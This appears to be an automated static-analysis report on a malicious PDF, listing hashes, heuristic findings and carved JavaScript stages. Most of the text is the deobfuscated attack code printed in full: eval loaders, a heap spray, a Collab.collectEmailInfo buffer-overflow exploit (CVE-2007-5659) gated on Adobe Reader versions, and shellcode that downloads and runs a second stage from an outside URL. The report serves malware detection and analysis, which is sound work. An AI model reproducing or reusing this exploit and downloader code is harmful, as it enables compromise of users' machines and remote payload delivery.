Malicious PDF — malware analysis report

Static analysis result for SHA-256 a9a31cf9756a0a43…

Verdict: MALICIOUS
File type: PDF
Size: 16.6 KB
First seen: 2026-05-08
MD5: 5a879cc71c2fa58005fbdf19897060e2
SHA-1: ed2cb8d6de789f852a81317974db11a21e71c2f7
SHA-256: a9a31cf9756a0a43442e881b7d4a92a3e6b3c3ff5349a1a596d5eda11b868940
Risk score: 266

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains multiple embedded JavaScript streams, some of which are heavily obfuscated. The heuristics indicate that these scripts are designed to be decoded and executed, likely to download and run a secondary payload. The presence of 'String.fromCharCode' and the 'syncAnnotScan' primitive further suggest a deliberate attempt to hide malicious code. No specific family could be identified due to the obfuscation.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 | critical | CVE exact | CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action | low | 4 related findings | PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) | high | CVE likely | PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var sq2R_V_i___atW = new Array();var UE__y_0su = 0;var F8P0uPTF0Yc5f = "";function D60_aQ4(D6v4x__t__m, V3I_X388_s){var GR_u__2i = V3I_X388_s.toString();var H_cC4__MXfu4Kt = "";for(var B_fE_pm = 0; B_fE_pm < GR_u__2i.length; B_fE_pm++) {var Sx__2_1_nHm_2a = parseInt(GR_u__2i.substr(B_fE_pm, 1));if (!isNaN(Sx__2_1_nHm_2a)) {Sx__2_1_nHm_2a = Sx__2_1_nHm_2a.toString(16);if (Sx__2_1_nHm_2a.length == 1) { Sx__2_1_nHm_2a = "0" + Sx__2_1_nHm_2a; }else if (Sx__2_1_nHm_2a.length != 2) { Sx__2_1_nHm_2a =  …
  • PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL | high | PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream | low | PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive | low | PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://click-clicke.com/cgi-bin/plt/n002106201r0019Mb287ac98Rc0af8139X653add9dY3867ac66Z0100f060 (referenced by PDF JavaScript)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0xE1 | 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump) {
    var result = "";
    var list = str.split(',');
    for (var i = 0; i < list.length; i++) {
        result += String.fromCharCode(list[i] - jump);
    }
    return result;
}
numeric_charcode_stage_000.js | deobfuscated-js | numeric char-code string decoded JavaScript at offset 0xEF | 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1CD2 | 12403 bytes
SHA-256: 1e2faaa5bfce56154f6eaefd91502c27f189c0ddeaa7cdcdf960ee82a1a2d9b1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function gD_O_8_8t20Xq(GcyhDn_8q2VBOs, x_EK_vD_J3T_82){var fgh = "eva";var t___gD86c_8quCl = arguments['cal'+'lee'];var Fo3Nm58d = 0;try {var lCjg_nmgm = 0;if (app) {Fo3Nm58d++;x_EK_vD_J3T_82 = pr[lCjg_nmgm].subject;}Fo3Nm58d++;} catch(e) { }var a_0XqXXnVV8b = new Array();if (GcyhDn_8q2VBOs) { a_0XqXXnVV8b = GcyhDn_8q2VBOs;} else {var G_1Poc16p = 0;var C__27__p = 0;var B218IF = 512;var LV62_1D = 53;t___gD86c_8quCl = t___gD86c_8quCl.toString();LV62_1D = LV62_1D - 5;var St1_Vy5 = LV62_1D + 10;St1_Vy5 = St1_Vy5 - 1;while(C__27__p < t___gD86c_8quCl.length) {var R__Q57_6y_8 = 1;var j_4iv3T3HOQoN = t___gD86c_8quCl["charCo" + "deAt"](C__27__p);if (j_4iv3T3HOQoN >= LV62_1D && j_4iv3T3HOQoN <= St1_Vy5) {if (G_1Poc16p == 4) {G_1Poc16p = 0;}if (isNaN(a_0XqXXnVV8b[G_1Poc16p])) {var lCjg_nmgm = 0;a_0XqXXnVV8b[G_1Poc16p] = lCjg_nmgm;}a_0XqXXnVV8b[G_1Poc16p] += j_4iv3T3HOQoN;if (a_0XqXXnVV8b[G_1Poc16p] > B218IF) {a_0XqXXnVV8b[G_1Poc16p] -= 512;}G_1Poc16p++;}C__27__p++;}}G_1Poc16p = 4;for (var xBcy8_A56 = 0; xBcy8_A56 < 4; xBcy8_A56++) {if (a_0XqXXnVV8b[xBcy8_A56] > 256) {a_0XqXXnVV8b[xBcy8_A56] -= 256;}}var V7R_uSCC3__Q44 = 0;var nN8C___W = "";var KS7__Q = 0;var DRYG4ckd7MDr7 = 0;var V6LMhE__5 = 0;var Ih_q6_5yWni6t3H;var QrBY_I160 = 23;while(DRYG4ckd7MDr7 < x_EK_vD_J3T_82.length) {var IYSKHt_Et2R6uW = x_EK_vD_J3T_82.substr(DRYG4ckd7MDr7, 1) + "YY";var XY__d0_0UNABT = parseInt(IYSKHt_Et2R6uW, QrBY_I160);if (KS7__Q) {Ih_q6_5yWni6t3H += XY__d0_0UNABT;if (V7R_uSCC3__Q44 == 4) {V7R_uSCC3__Q44 -= 4;}var SLfd5a_p4nXUmX = Ih_q6_5yWni6t3H;SLfd5a_p4nXUmX = SLfd5a_p4nXUmX - (V6LMhE__5 + 2) * a_0XqXXnVV8b[V7R_uSCC3__Q44];if (SLfd5a_p4nXUmX < 0) {SLfd5a_p4nXUmX = SLfd5a_p4nXUmX - Math.floor(SLfd5a_p4nXUmX / 256) * 256;}SLfd5a_p4nXUmX = String.fromCharCode(SLfd5a_p4nXUmX);if (Fo3Nm58d == 2) {nN8C___W += SLfd5a_p4nXUmX;} else if (Fo3Nm58d == 1) {nN8C___W += XY__d0_0UNABT;} else {nN8C___W += DRYG4ckd7MDr7;}V7R_uSCC3__Q44++;V6LMhE__5++;KS7__Q = 0;} else {Ih_q6_5yWni6t3H = XY__d0_0UNABT * 
23;KS7__Q = 1;}DRYG4ckd7MDr7++;}var aa = this;aa[fgh + 'l'](nN8C___W);}
gD_O_8_8t20Xq(0, "[base-23 encoded payload string omitted]");
legacy_pdfkit_stage_001.js | deobfuscated-js | nested inline base-23 callee-key decoded JavaScript at offset 0x1CD2 | 5153 bytes
SHA-256: e8ceb47f7849c6cca1c9c9ab509e4abc9725a2fb8a4ad21df4cbb03925329fe4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var sq2R_V_i___atW = new Array();var UE__y_0su = 0;var F8P0uPTF0Yc5f = "";function D60_aQ4(D6v4x__t__m, V3I_X388_s){var GR_u__2i = V3I_X388_s.toString();var H_cC4__MXfu4Kt = "";for(var B_fE_pm = 0; B_fE_pm < GR_u__2i.length; B_fE_pm++) {var Sx__2_1_nHm_2a = parseInt(GR_u__2i.substr(B_fE_pm, 1));if (!isNaN(Sx__2_1_nHm_2a)) {Sx__2_1_nHm_2a = Sx__2_1_nHm_2a.toString(16);if (Sx__2_1_nHm_2a.length == 1) { Sx__2_1_nHm_2a = "0" + Sx__2_1_nHm_2a; }else if (Sx__2_1_nHm_2a.length != 2) { Sx__2_1_nHm_2a = "00"; }H_cC4__MXfu4Kt = Sx__2_1_nHm_2a + H_cC4__MXfu4Kt;}}while(H_cC4__MXfu4Kt.length < 8) { H_cC4__MXfu4Kt = "0" + H_cC4__MXfu4Kt; }var Q6P_6_31JaK6F2 = D6v4x__t__m.toString(16);if (Q6P_6_31JaK6F2.length == 1) { Q6P_6_31JaK6F2 = "0" + Q6P_6_31JaK6F2; }else if (Q6P_6_31JaK6F2.length != 2) { Q6P_6_31JaK6F2 = "00"; }H_cC4__MXfu4Kt = "3" + Q6P_6_31JaK6F2 + "P" + H_cC4__MXfu4Kt;return H_cC4__MXfu4Kt;}function k2e221(nR_woX1_5JQIY8, dMbbD2Dr_80hsW){var yMBE7_514 = new Array("");var CX_58XOD = nR_woX1_5JQIY8;var KQ_____K62c1_H;if ((KQ_____K62c1_H = nR_woX1_5JQIY8.lastIndexOf("%u00")) != -1) {if (KQ_____K62c1_H + 6 == nR_woX1_5JQIY8.length) {yMBE7_514[0] = nR_woX1_5JQIY8.substr(KQ_____K62c1_H + 4, 2);CX_58XOD = nR_woX1_5JQIY8.substring(0, KQ_____K62c1_H);}}KQ_____K62c1_H = 1;for (B_fE_pm = 0; B_fE_pm < dMbbD2Dr_80hsW.length; B_fE_pm++) {var y_G3eK_B___0 = dMbbD2Dr_80hsW.charCodeAt(B_fE_pm).toString(16);if (y_G3eK_B___0.length == 1) { y_G3eK_B___0 = "0" + y_G3eK_B___0; }yMBE7_514[KQ_____K62c1_H] = y_G3eK_B___0;KQ_____K62c1_H++;}B_fE_pm = yMBE7_514[0].length ? 
0 : 1;yMBE7_514[KQ_____K62c1_H] = "00";yMBE7_514[KQ_____K62c1_H + 1] = "00";KQ_____K62c1_H += 2;if ((yMBE7_514.length - B_fE_pm) % 2) {yMBE7_514[KQ_____K62c1_H] = "00";}while(B_fE_pm < yMBE7_514.length) {CX_58XOD += "%u" + yMBE7_514[B_fE_pm + 1] + yMBE7_514[B_fE_pm];B_fE_pm += 2;}CX_58XOD += "%u0000";return CX_58XOD;}function w_vt_R1lrr72s(I_Y__N1s10_j7v, dc5_crMIq){while (I_Y__N1s10_j7v.length*2<dc5_crMIq) {I_Y__N1s10_j7v += I_Y__N1s10_j7v;}I_Y__N1s10_j7v = I_Y__N1s10_j7v.substring(0,dc5_crMIq/2);return I_Y__N1s10_j7v;}function poyA8_Q(vIEpt3_k2g, BqIu83Gl82xx, Vh_T2_A_ji){var Qtm_84_38e = 0x0c0c0c0c;var I_Y__N1s10_j7v = unescape(BqIu83Gl82xx);var dMbbD2Dr_80hsW = D60_aQ4(vIEpt3_k2g, Vh_T2_A_ji);var J536N5t76_n = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var nR_woX1_5JQIY8 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6170%u5446%u006f%u7468%u7074%u2f3a%u632f%u696c%u6b63%u632d%u696c%u6b63%u2e65%u6f63%u2f6d%u6763%u2d69%u6962%u2f6e%u6c70
%u2f74%u306e%u3230%u3031%u3236%u3130%u3072%u3130%u4d39%u3262%u3738%u6361%u3839%u6352%u6130%u3866%u3331%u5839%u3536%u6133%u6464%u6439%u3359%u3638%u6137%u3663%u5a36%u3130%u3030%u3066%u3036";app.i3016NAHWu2AK4 = unescape(k2e221(nR_woX1_5JQIY8, dMbbD2Dr_80hsW));var n3r__l = 0x400000;var G_U_cSnot___dx = J536N5t76_n.length * 2;var dc5_crMIq = n3r__l - (G_U_cSnot___dx+0x38);I_Y__N1s10_j7v = w_vt_R1lrr72s(I_Y__N1s10_j7v, dc5_crMIq);var kFg_Iw0_6mih = (Qtm_84_38e - 0x400000)/n3r__l;for (var Q__2Eto = 0; Q__2Eto < kFg_Iw0_6mih; Q__2Eto++) {sq2R_V_i___atW[Q__2Eto] = I_Y__N1s10_j7v + J536N5t76_n;}}function O__b_u_U_xCq6F(){var OKDLt__tcU7_h5 = "";for (B_fE_pm = 0; B_fE_pm < 12; B_fE_pm++) {OKDLt__tcU7_h5 += unescape("%u0c0c%u0c0c");}var p06k7_2npTkN6 = "";for (B_fE_pm = 0; B_fE_pm < 750; B_fE_pm++) {p06k7_2npTkN6 += OKDLt__tcU7_h5;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: p06k7_2npTkN6});app.clearTimeOut(UE__y_0su);}function oQ22uJG7_5(OKNP07){var bBn_P1_XO1vXhUp = UE__y_0su;if ((OKNP07 >= 8 && OKNP07 < 8.11) || OKNP07 < 7.1) {poyA8_Q(23, "%u0c0c%u0c0c", OKNP07);O__b_u_U_xCq6F();}if (bBn_P1_XO1vXhUp) {app.clearTimeOut(bBn_P1_XO1vXhUp);}}var Vh_T2_A_ji = 0;var b7T36_5_4__6_Qc = app.plugIns;for (var x_1OF4 = 0; x_1OF4 < b7T36_5_4__6_Qc.length; x_1OF4++) {var AWP_E4_v0C_HH = b7T36_5_4__6_Qc[x_1OF4].version;if (AWP_E4_v0C_HH > Vh_T2_A_ji) { Vh_T2_A_ji = AWP_E4_v0C_HH; }}if (app.viewerVersion == 9.103 && Vh_T2_A_ji < 9.13) {Vh_T2_A_ji = 9.13;}app.f20lk151_1__4n = oQ22uJG7_5;UE__y_0su = app.setTimeOut("app.f20lk151_1__4n(" + Vh_T2_A_ji.toString() + ")", 50);